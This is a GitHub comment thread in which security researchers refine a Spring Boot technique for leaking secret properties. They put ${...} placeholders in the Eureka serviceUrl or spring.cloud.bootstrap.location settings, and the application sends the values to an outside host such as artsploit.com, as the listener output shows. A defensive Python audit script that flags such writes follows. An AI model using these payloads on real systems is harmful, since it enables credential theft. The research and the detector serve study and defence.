
Comments (3)

LandGrey avatar LandGrey commented on May 26, 2024

A correction:

  • The source is not what is in the article you cited. Stealing the password with spring.cloud.bootstrap.location=http://${somedb.password}@artsploit.com/yaml-payload.yml simply cannot be reproduced; there is reason to suspect it does not work at all, and that the author neither tested it nor traced the source code.

  • You can trace the password-stealing flow through eureka.client.serviceUrl.defaultZone. It ties into Eureka's authentication flow, which is why the password can be carried out.


UUUUnotfound avatar UUUUnotfound commented on May 26, 2024

OK, thanks for the correction.

spring.cloud.bootstrap.location=http://${somedb.password}@artsploit.com/yaml-payload.yml

This one indeed cannot carry the password out in the auth header; Spring Boot ignores it there. But the following form can be used:

spring.cloud.bootstrap.location=http://127.0.0.1:8888/${somedb.password}.yml

Listening on [0.0.0.0] (family 0, port 8888)
Connection from localhost 1188 received!
HEAD /123456.yml HTTP/1.1
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.8.0_201
Host: 127.0.0.1:8888
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

This one,
eureka.client.serviceUrl.defaultZone=http://${somedb.password}@127.0.0.1:5000

is a technique I also stumbled on in March last year while digging into Eureka. Overall it still works by getting Spring to fill the placeholder with the asterisk-masked field, which is what carries the data out. Choosing the auth header was likewise incidental: at the time I saw that the url_path Eureka requested was /apps/, and assumed it could not be passed in the url_path. I also thought about the case where the HTTP request cannot get out, and even about passing it via dnslog.

I just tried it, and it can indeed also be passed in the url_path:
eureka.client.serviceUrl.defaultZone=http://${somedb.password}@127.0.0.1:5000/123123

Listening on [0.0.0.0] (family 0, port 5000)
Connection from localhost 1319 received!
GET /123123/apps/ HTTP/1.1
Accept: application/json
DiscoveryIdentity-Name: DefaultClient
DiscoveryIdentity-Version: 1.4
DiscoveryIdentity-Id: 192.168.175.1
Accept-Encoding: gzip
Host: 127.0.0.1:5000
Connection: Keep-Alive
User-Agent: Java-EurekaClient/v1.6.2
Authorization: Basic MTIzNDU2Om51bGw=

spring.cloud.bootstrap.location is a point I noticed while writing the article this year, where it can lead to RCE. Seeing that it is also an HTTP request, I extended the idea without having time to test it, which was indeed not rigorous enough. I will fix this in the article.


LandGrey avatar LandGrey commented on May 26, 2024

Learned something. Indeed, while the target is making an outbound HTTP request, a placeholder in the url path can be used to carry data out.

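The thread's two variants share one shape: a URL-valued property is written with a `${...}` placeholder that Spring resolves before the application makes its outbound request, so the referenced value lands in the request's userinfo or path. The following audit check, added here as an example and not code from the thread or the springbootvulexploit project, flags such writes; it assumes the property key/value pairs come from some audit log of runtime property changes (for instance Actuator `/env` writes), and the sample writes are constructed from the values shown above.

```python
import re
from urllib.parse import urlsplit

# Properties the thread shows being pointed at an attacker-chosen URL: both make the
# application itself issue an outbound HTTP request built from the property value.
URL_PROPERTIES = {"eureka.client.serviceUrl.defaultZone", "spring.cloud.bootstrap.location"}
PLACEHOLDER = re.compile(r"\$\{([^}]+)\}")


def audit_property(key: str, value: str) -> list[dict]:
    """Flag a write to a URL-valued property whose value contains ${...} placeholders.

    Spring resolves the placeholder before the request is made, so the referenced
    property's value ends up in the userinfo (Basic auth) or path of an outbound request.
    """
    if key not in URL_PROPERTIES:
        return []
    refs = PLACEHOLDER.findall(value)
    if not refs:
        return []
    parts = urlsplit(value)
    userinfo = parts.netloc.rsplit("@", 1)[0] if "@" in parts.netloc else ""
    findings = []
    for ref in refs:
        token = "${" + ref + "}"
        if token in userinfo:
            where = "userinfo"        # leaks via the Authorization: Basic header
        elif token in parts.path:
            where = "path"            # leaks via the request line
        elif token in parts.query:
            where = "query"
        else:
            where = "other"
        findings.append({"property": key, "leaks": ref, "via": where, "host": parts.hostname})
    return findings


# Constructed sample of property writes as an audit log of /env changes might record them
# (first two values taken from the thread; the others are benign writes for contrast).
SAMPLE_WRITES = [
    ("spring.cloud.bootstrap.location", "http://127.0.0.1:8888/${somedb.password}.yml"),
    ("eureka.client.serviceUrl.defaultZone", "http://${somedb.password}@127.0.0.1:5000/123123"),
    ("eureka.client.serviceUrl.defaultZone", "http://eureka.internal:8761/eureka/"),
    ("somedb.password", "${vault.db.password}"),  # not a URL property: out of scope here
]


def audit_all(writes=SAMPLE_WRITES) -> list[dict]:
    return [f for key, value in writes for f in audit_property(key, value)]


if __name__ == "__main__":
    for f in audit_all():
        print(f"{f['property']}: leaks '{f['leaks']}' via {f['via']} to {f['host']}")
```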
